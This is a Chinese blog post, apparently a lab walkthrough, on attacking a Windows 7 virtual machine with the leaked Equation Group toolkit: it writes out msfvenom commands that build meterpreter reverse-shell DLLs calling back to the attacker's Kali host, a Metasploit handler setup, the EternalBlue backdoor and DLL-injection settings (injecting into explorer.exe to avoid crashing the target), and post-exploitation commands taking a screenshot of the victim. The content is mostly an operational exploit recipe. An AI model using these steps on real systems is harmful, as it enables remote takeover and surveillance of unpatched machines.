zoukankan      html  css  js  c++  java
  • 方程式工具渗透实战

    攻击机:

    Kali:192.168.1.103

    Win2K3:192.168.1.109

    靶机:

    Win7(x86):192.168.1.108

    1、win2K3上要先装好Python运行环境:

    安装Python-2.6.6.msipywin32-221.win32-py2.6.exe

    2、现在kali上生成payload模块:

    目标主机x86平台:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x86.dll

    目标主机x64平台:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x64.dll

    然后将payload文件拷贝到win2K3C盘根目录下

    3、打开msf

    msfconsole

    设置exploit模块

    use exploit/multi/handler

    set LHOST 192.168.1.103

    set LPORT 5555

    目标主机x86平台:

    set PAYLOAD windows/meterpreter/reverse_tcp

    目标主机x64平台:

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    开始监听

    exploit

     

    4、在win2K3,打开方程式工具包,在Windows目录下

     

    新建一个名为listeningposts文件夹

     

    否则程序会运行出错。

    运行fb.py文件(以下是在特殊的地方设置,未做说明的地方回车选择默认设置)

     

    由于win2k3安装在虚拟机,为了节省空间只设了一个C盘,所以日志位置设置在C

     

    新建一个工程,name自定义

     

    先用永恒之蓝在目标主机上安装后门

     

    之后回车,target主机选择win72K8R2

     

    Mode选择FB

     

    之后回车默认选择,然后就在目标主机上安装了后门了

     

    然后用怒怼模块

     

    协议选择SMB

     

    平台选择x86

     

    攻击形式选择rundll

     

    Payload选择刚才生成的x86.dll,填入路径

     

    选择被注入的进程,在实验的时候如果选择默认的进程lsass.exe,在注入过程中会导致靶机重启,所以这里填入explorer.exe

     

    然后回车、回车

    直到注入成功

     

    kali上就可以看到回弹

     

    getuid显示靶机IDtest-PC

     

    screenshot截屏

     

    存储在/root/XxmgVxIn.jpeg,就可以看到靶机的屏幕截图

     

  • 相关阅读:
    4种xml解析器区别
    eclipse的快捷键(常用)
    eclipse修改项目访问前缀
    oracle创建用户
    导入安全证书到jdk
    laravel 命令行输出进度条
    sql 事务的四种隔离级别
    supervisor 通过图形界面管理
    supervisor "INFO spawnerr: unknown error making dispatchers for xxx" 错误
    linux expect 的使用
  • 原文地址:https://www.cnblogs.com/zylq-blog/p/7050331.html
Copyright © 2011-2022 走看看